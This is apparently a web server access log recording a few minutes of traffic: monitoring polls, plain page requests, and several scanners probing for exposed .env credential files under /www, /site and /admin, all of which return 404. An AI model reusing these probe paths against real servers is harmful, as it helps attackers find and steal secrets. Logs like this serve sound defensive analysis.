4.1.229.86 - - [02/Mar/2023:19:55:25 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [02/Mar/2023:19:55:25 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.89.5.201 - - [02/Mar/2023:19:56:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
65.132.186.86 - - [02/Mar/2023:19:56:17 +0100] "GET /site/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.132.186.86 - - [02/Mar/2023:19:56:17 +0100] "POST /site HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:56:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.119.51.126 - - [02/Mar/2023:19:56:50 +0100] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.119.51.126 - - [02/Mar/2023:19:56:51 +0100] "POST /admin HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [02/Mar/2023:19:57:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:19:57:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.119.51.126 - - [02/Mar/2023:19:58:07 +0100] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.119.51.126 - - [02/Mar/2023:19:58:08 +0100] "POST /admin HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
179.43.177.242 - - [02/Mar/2023:19:58:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:58:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:59:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:20:00:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
